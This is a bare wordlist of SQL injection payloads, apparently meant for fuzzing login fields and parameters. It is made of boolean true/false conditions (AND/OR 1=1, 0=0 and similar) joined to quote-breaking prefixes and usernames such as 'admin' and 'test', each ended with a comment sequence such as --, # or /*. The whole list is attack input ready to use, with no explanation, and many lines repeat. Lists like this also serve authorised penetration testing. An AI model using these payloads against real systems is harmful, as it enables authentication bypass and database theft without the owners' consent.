' AND 1="1#
' AND 1="0;
' AND 1="1;
' AND 1="0;#
' AND 1="1;#
' AND 1="0/*
' AND 1="1/*
' AND 1="0--
' AND 1="1--
' AND 1="0-- -;
' AND 1="1-- -;
' AND 1="0-- -
' AND 1="1-- -
' AND 1="0#
' AND 1="1#
' AND 1="0;
' AND 1="1;
' AND 1="0;#
' AND 1="1;#
' AND 1="0/*
' AND 1="1/*
' AND 1="0--
' AND 1="1--
' AND 1="0-- -;
' AND 1="1-- -;
' AND 1="0-- -
' AND 1="1-- -
' AND 1="0#
' AND 1="1#
' AND 1="0;
' AND 1="1;
' AND 1="0;#
' AND 1="1;#
' AND 1="0/*
' AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
user" AND 1="0--
user" AND 1="1--
user" AND 1="0-- -;
user" AND 1="1-- -;
user" AND 1="0-- -
user" AND 1="1-- -
user" AND 1="0#
user" AND 1="1#
user" AND 1="0;
user" AND 1="1;
user" AND 1="0;#
user" AND 1="1;#
user" AND 1="0/*
user" AND 1="1/*
admin" AND 1="0--
admin" AND 1="1--
admin" AND 1="0-- -;
admin" AND 1="1-- -;
admin" AND 1="0-- -
admin" AND 1="1-- -
admin" AND 1="0#
admin" AND 1="1#
admin" AND 1="0;
admin" AND 1="1;
admin" AND 1="0;#
admin" AND 1="1;#
admin" AND 1="0/*
admin" AND 1="1/*
adam" AND 1="0--
adam" AND 1="1--
adam" AND 1="0-- -;
adam" AND 1="1-- -;
adam" AND 1="0-- -
adam" AND 1="1-- -
adam" AND 1="0#
adam" AND 1="1#
adam" AND 1="0;
adam" AND 1="1;
adam" AND 1="0;#
adam" AND 1="1;#
adam" AND 1="0/*
adam" AND 1="1/*
test" AND 1="0--
test" AND 1="1--
test" AND 1="0-- -;
test" AND 1="1-- -;
test" AND 1="0-- -
test" AND 1="1-- -
test" AND 1="0#
test" AND 1="1#
test" AND 1="0;
test" AND 1="1;
test" AND 1="0;#
test" AND 1="1;#
test" AND 1="0/*
test" AND 1="1/*
user' AND 1="0--
user' AND 1="1--
user' AND 1="0-- -;
user' AND 1="1-- -;
user' AND 1="0-- -
user' AND 1="1-- -
user' AND 1="0#
user' AND 1="1#
user' AND 1="0;
user' AND 1="1;
user' AND 1="0;#
user' AND 1="1;#
user' AND 1="0/*
user' AND 1="1/*
admin' AND 1="0--
admin' AND 1="1--
admin' AND 1="0-- -;
admin' AND 1="1-- -;
admin' AND 1="0-- -
admin' AND 1="1-- -
admin' AND 1="0#
admin' AND 1="1#
admin' AND 1="0;
admin' AND 1="1;
admin' AND 1="0;#
admin' AND 1="1;#
admin' AND 1="0/*
admin' AND 1="1/*
adam' AND 1="0--
adam' AND 1="1--
adam' AND 1="0-- -;
adam' AND 1="1-- -;
adam' AND 1="0-- -
adam' AND 1="1-- -
adam' AND 1="0#
adam' AND 1="1#
adam' AND 1="0;
adam' AND 1="1;
adam' AND 1="0;#
adam' AND 1="1;#
adam' AND 1="0/*
adam' AND 1="1/*
test' AND 1="0--
test' AND 1="1--
test' AND 1="0-- -;
test' AND 1="1-- -;
test' AND 1="0-- -
test' AND 1="1-- -
test' AND 1="0#
test' AND 1="1#
test' AND 1="0;
test' AND 1="1;
test' AND 1="0;#
test' AND 1="1;#
test' AND 1="0/*
test' AND 1="1/*
user AND 1="0--
user AND 1="1--
user AND 1="0-- -;
user AND 1="1-- -;
user AND 1="0-- -
user AND 1="1-- -
user AND 1="0#
user AND 1="1#
user AND 1="0;
user AND 1="1;
user AND 1="0;#
user AND 1="1;#
user AND 1="0/*
user AND 1="1/*
admin AND 1="0--
admin AND 1="1--
admin AND 1="0-- -;
admin AND 1="1-- -;
admin AND 1="0-- -
admin AND 1="1-- -
admin AND 1="0#
admin AND 1="1#
admin AND 1="0;
admin AND 1="1;
admin AND 1="0;#
admin AND 1="1;#
admin AND 1="0/*
admin AND 1="1/*
adam AND 1="0--
adam AND 1="1--
adam AND 1="0-- -;
adam AND 1="1-- -;
adam AND 1="0-- -
adam AND 1="1-- -
adam AND 1="0#
adam AND 1="1#
adam AND 1="0;
adam AND 1="1;
adam AND 1="0;#
adam AND 1="1;#
adam AND 1="0/*
adam AND 1="1/*
test AND 1="0--
test AND 1="1--
test AND 1="0-- -;
test AND 1="1-- -;
test AND 1="0-- -
test AND 1="1-- -
test AND 1="0#
test AND 1="1#
test AND 1="0;
test AND 1="1;
test AND 1="0;#
test AND 1="1;#
test AND 1="0/*
test AND 1="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
user" AND 0="0--
user" AND 0="1--
user" AND 0="0-- -;
user" AND 0="1-- -;
user" AND 0="0-- -
user" AND 0="1-- -
user" AND 0="0#
user" AND 0="1#
user" AND 0="0;
user" AND 0="1;
user" AND 0="0;#
user" AND 0="1;#
user" AND 0="0/*
user" AND 0="1/*
admin" AND 0="0--
admin" AND 0="1--
admin" AND 0="0-- -;
admin" AND 0="1-- -;
admin" AND 0="0-- -
admin" AND 0="1-- -
admin" AND 0="0#
admin" AND 0="1#
admin" AND 0="0;
admin" AND 0="1;
admin" AND 0="0;#
admin" AND 0="1;#
admin" AND 0="0/*
admin" AND 0="1/*
adam" AND 0="0--
adam" AND 0="1--
adam" AND 0="0-- -;
adam" AND 0="1-- -;
adam" AND 0="0-- -
adam" AND 0="1-- -
adam" AND 0="0#
adam" AND 0="1#
adam" AND 0="0;
adam" AND 0="1;
adam" AND 0="0;#
adam" AND 0="1;#
adam" AND 0="0/*
adam" AND 0="1/*
test" AND 0="0--
test" AND 0="1--
test" AND 0="0-- -;
test" AND 0="1-- -;
test" AND 0="0-- -
test" AND 0="1-- -
test" AND 0="0#
test" AND 0="1#
test" AND 0="0;
test" AND 0="1;
test" AND 0="0;#
test" AND 0="1;#
test" AND 0="0/*
test" AND 0="1/*
user' AND 0="0--
user' AND 0="1--
user' AND 0="0-- -;
user' AND 0="1-- -;
user' AND 0="0-- -
user' AND 0="1-- -
user' AND 0="0#
user' AND 0="1#
user' AND 0="0;
user' AND 0="1;
user' AND 0="0;#
user' AND 0="1;#
user' AND 0="0/*
user' AND 0="1/*
admin' AND 0="0--
admin' AND 0="1--
admin' AND 0="0-- -;
admin' AND 0="1-- -;
admin' AND 0="0-- -
admin' AND 0="1-- -
admin' AND 0="0#
admin' AND 0="1#
admin' AND 0="0;
admin' AND 0="1;
admin' AND 0="0;#
admin' AND 0="1;#
admin' AND 0="0/*
admin' AND 0="1/*
adam' AND 0="0--
adam' AND 0="1--
adam' AND 0="0-- -;
adam' AND 0="1-- -;
adam' AND 0="0-- -
adam' AND 0="1-- -
adam' AND 0="0#
adam' AND 0="1#
adam' AND 0="0;
adam' AND 0="1;
adam' AND 0="0;#
adam' AND 0="1;#
adam' AND 0="0/*
adam' AND 0="1/*
test' AND 0="0--
test' AND 0="1--
test' AND 0="0-- -;
test' AND 0="1-- -;
test' AND 0="0-- -
test' AND 0="1-- -
test' AND 0="0#
test' AND 0="1#
test' AND 0="0;
test' AND 0="1;
test' AND 0="0;#
test' AND 0="1;#
test' AND 0="0/*
test' AND 0="1/*
user AND 0="0--
user AND 0="1--
user AND 0="0-- -;
user AND 0="1-- -;
user AND 0="0-- -
user AND 0="1-- -
user AND 0="0#
user AND 0="1#
user AND 0="0;
user AND 0="1;
user AND 0="0;#
user AND 0="1;#
user AND 0="0/*
user AND 0="1/*
admin AND 0="0--
admin AND 0="1--
admin AND 0="0-- -;
admin AND 0="1-- -;
admin AND 0="0-- -
admin AND 0="1-- -
admin AND 0="0#
admin AND 0="1#
admin AND 0="0;
admin AND 0="1;
admin AND 0="0;#
admin AND 0="1;#
admin AND 0="0/*
admin AND 0="1/*
adam AND 0="0--
adam AND 0="1--
adam AND 0="0-- -;
adam AND 0="1-- -;
adam AND 0="0-- -
adam AND 0="1-- -
adam AND 0="0#
adam AND 0="1#
adam AND 0="0;
adam AND 0="1;
adam AND 0="0;#
adam AND 0="1;#
adam AND 0="0/*
adam AND 0="1/*
test AND 0="0--
test AND 0="1--
test AND 0="0-- -;
test AND 0="1-- -;
test AND 0="0-- -
test AND 0="1-- -
test AND 0="0#
test AND 0="1#
test AND 0="0;
test AND 0="1;
test AND 0="0;#
test AND 0="1;#
test AND 0="0/*
test AND 0="1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
user" OR 1='0--
user" OR 1='1--
user" OR 1='0-- -;
user" OR 1='1-- -;
user" OR 1='0-- -
user" OR 1='1-- -
user" OR 1='0#
user" OR 1='1#
user" OR 1='0;
user" OR 1='1;
user" OR 1='0;#
user" OR 1='1;#
user" OR 1='0/*
user" OR 1='1/*
admin" OR 1='0--
admin" OR 1='1--
admin" OR 1='0-- -;
admin" OR 1='1-- -;
admin" OR 1='0-- -
admin" OR 1='1-- -
admin" OR 1='0#
admin" OR 1='1#
admin" OR 1='0;
admin" OR 1='1;
admin" OR 1='0;#
admin" OR 1='1;#
admin" OR 1='0/*
admin" OR 1='1/*
adam" OR 1='0--
adam" OR 1='1--
adam" OR 1='0-- -;
adam" OR 1='1-- -;
adam" OR 1='0-- -
adam" OR 1='1-- -
adam" OR 1='0#
adam" OR 1='1#
adam" OR 1='0;
adam" OR 1='1;
adam" OR 1='0;#
adam" OR 1='1;#
adam" OR 1='0/*
adam" OR 1='1/*
test" OR 1='0--
test" OR 1='1--
test" OR 1='0-- -;
test" OR 1='1-- -;
test" OR 1='0-- -
test" OR 1='1-- -
test" OR 1='0#
test" OR 1='1#
test" OR 1='0;
test" OR 1='1;
test" OR 1='0;#
test" OR 1='1;#
test" OR 1='0/*
test" OR 1='1/*
user' OR 1='0--
user' OR 1='1--
user' OR 1='0-- -;
user' OR 1='1-- -;
user' OR 1='0-- -
user' OR 1='1-- -
user' OR 1='0#
user' OR 1='1#
user' OR 1='0;
user' OR 1='1;
user' OR 1='0;#
user' OR 1='1;#
user' OR 1='0/*
user' OR 1='1/*
admin' OR 1='0--
admin' OR 1='1--
admin' OR 1='0-- -;
admin' OR 1='1-- -;
admin' OR 1='0-- -
admin' OR 1='1-- -
admin' OR 1='0#
admin' OR 1='1#
admin' OR 1='0;
admin' OR 1='1;
admin' OR 1='0;#
admin' OR 1='1;#
admin' OR 1='0/*
admin' OR 1='1/*
adam' OR 1='0--
adam' OR 1='1--
adam' OR 1='0-- -;
adam' OR 1='1-- -;
adam' OR 1='0-- -
adam' OR 1='1-- -
adam' OR 1='0#
adam' OR 1='1#
adam' OR 1='0;
adam' OR 1='1;
adam' OR 1='0;#
adam' OR 1='1;#
adam' OR 1='0/*
adam' OR 1='1/*
test' OR 1='0--
test' OR 1='1--
test' OR 1='0-- -;
test' OR 1='1-- -;
test' OR 1='0-- -
test' OR 1='1-- -
test' OR 1='0#
test' OR 1='1#
test' OR 1='0;
test' OR 1='1;
test' OR 1='0;#
test' OR 1='1;#
test' OR 1='0/*
test' OR 1='1/*
user OR 1='0--
user OR 1='1--
user OR 1='0-- -;
user OR 1='1-- -;
user OR 1='0-- -
user OR 1='1-- -
user OR 1='0#
user OR 1='1#
user OR 1='0;
user OR 1='1;
user OR 1='0;#
user OR 1='1;#
user OR 1='0/*
user OR 1='1/*
admin OR 1='0--
admin OR 1='1--
admin OR 1='0-- -;
admin OR 1='1-- -;
admin OR 1='0-- -
admin OR 1='1-- -
admin OR 1='0#
admin OR 1='1#
admin OR 1='0;
admin OR 1='1;
admin OR 1='0;#
admin OR 1='1;#
admin OR 1='0/*
admin OR 1='1/*
adam OR 1='0--
adam OR 1='1--
adam OR 1='0-- -;
adam OR 1='1-- -;
adam OR 1='0-- -
adam OR 1='1-- -
adam OR 1='0#
adam OR 1='1#
adam OR 1='0;
adam OR 1='1;
adam OR 1='0;#
adam OR 1='1;#
adam OR 1='0/*
adam OR 1='1/*
test OR 1='0--
test OR 1='1--
test OR 1='0-- -;
test OR 1='1-- -;
test OR 1='0-- -
test OR 1='1-- -
test OR 1='0#
test OR 1='1#
test OR 1='0;
test OR 1='1;
test OR 1='0;#
test OR 1='1;#
test OR 1='0/*
test OR 1='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
user" OR 0='0--
user" OR 0='1--
user" OR 0='0-- -;
user" OR 0='1-- -;
user" OR 0='0-- -
user" OR 0='1-- -
user" OR 0='0#
user" OR 0='1#
user" OR 0='0;
user" OR 0='1;
user" OR 0='0;#
user" OR 0='1;#
user" OR 0='0/*
user" OR 0='1/*
admin" OR 0='0--
admin" OR 0='1--
admin" OR 0='0-- -;
admin" OR 0='1-- -;
admin" OR 0='0-- -
admin" OR 0='1-- -
admin" OR 0='0#
admin" OR 0='1#
admin" OR 0='0;
admin" OR 0='1;
admin" OR 0='0;#
admin" OR 0='1;#
admin" OR 0='0/*
admin" OR 0='1/*
adam" OR 0='0--
adam" OR 0='1--
adam" OR 0='0-- -;
adam" OR 0='1-- -;
adam" OR 0='0-- -
adam" OR 0='1-- -
adam" OR 0='0#
adam" OR 0='1#
adam" OR 0='0;
adam" OR 0='1;
adam" OR 0='0;#
adam" OR 0='1;#
adam" OR 0='0/*
adam" OR 0='1/*
test" OR 0='0--
test" OR 0='1--
test" OR 0='0-- -;
test" OR 0='1-- -;
test" OR 0='0-- -
test" OR 0='1-- -
test" OR 0='0#
test" OR 0='1#
test" OR 0='0;
test" OR 0='1;
test" OR 0='0;#
test" OR 0='1;#
test" OR 0='0/*
test" OR 0='1/*
user' OR 0='0--
user' OR 0='1--
user' OR 0='0-- -;
user' OR 0='1-- -;
user' OR 0='0-- -
user' OR 0='1-- -
user' OR 0='0#
user' OR 0='1#
user' OR 0='0;
user' OR 0='1;
user' OR 0='0;#
user' OR 0='1;#
user' OR 0='0/*
user' OR 0='1/*
admin' OR 0='0--
admin' OR 0='1--
admin' OR 0='0-- -;
admin' OR 0='1-- -;
admin' OR 0='0-- -
admin' OR 0='1-- -
admin' OR 0='0#
admin' OR 0='1#
admin' OR 0='0;
admin' OR 0='1;
admin' OR 0='0;#
admin' OR 0='1;#
admin' OR 0='0/*
admin' OR 0='1/*
adam' OR 0='0--
adam' OR 0='1--
adam' OR 0='0-- -;
adam' OR 0='1-- -;
adam' OR 0='0-- -
adam' OR 0='1-- -
adam' OR 0='0#
adam' OR 0='1#
adam' OR 0='0;
adam' OR 0='1;
adam' OR 0='0;#
adam' OR 0='1;#
adam' OR 0='0/*
adam' OR 0='1/*
test' OR 0='0--
test' OR 0='1--
test' OR 0='0-- -;
test' OR 0='1-- -;
test' OR 0='0-- -
test' OR 0='1-- -
test' OR 0='0#
test' OR 0='1#
test' OR 0='0;
test' OR 0='1;
test' OR 0='0;#
test' OR 0='1;#
test' OR 0='0/*
test' OR 0='1/*
user OR 0='0--
user OR 0='1--
user OR 0='0-- -;
user OR 0='1-- -;
user OR 0='0-- -
user OR 0='1-- -
user OR 0='0#
user OR 0='1#
user OR 0='0;
user OR 0='1;
user OR 0='0;#
user OR 0='1;#
user OR 0='0/*
user OR 0='1/*
admin OR 0='0--
admin OR 0='1--
admin OR 0='0-- -;
admin OR 0='1-- -;
admin OR 0='0-- -
admin OR 0='1-- -
admin OR 0='0#
admin OR 0='1#
admin OR 0='0;
admin OR 0='1;
admin OR 0='0;#
admin OR 0='1;#
admin OR 0='0/*
admin OR 0='1/*
adam OR 0='0--
adam OR 0='1--
adam OR 0='0-- -;
adam OR 0='1-- -;
adam OR 0='0-- -
adam OR 0='1-- -
adam OR 0='0#
adam OR 0='1#
adam OR 0='0;
adam OR 0='1;
adam OR 0='0;#
adam OR 0='1;#
adam OR 0='0/*
adam OR 0='1/*
test OR 0='0--
test OR 0='1--
test OR 0='0-- -;
test OR 0='1-- -;
test OR 0='0-- -
test OR 0='1-- -
test OR 0='0#
test OR 0='1#
test OR 0='0;
test OR 0='1;
test OR 0='0;#
test OR 0='1;#
test OR 0='0/*
test OR 0='1/*
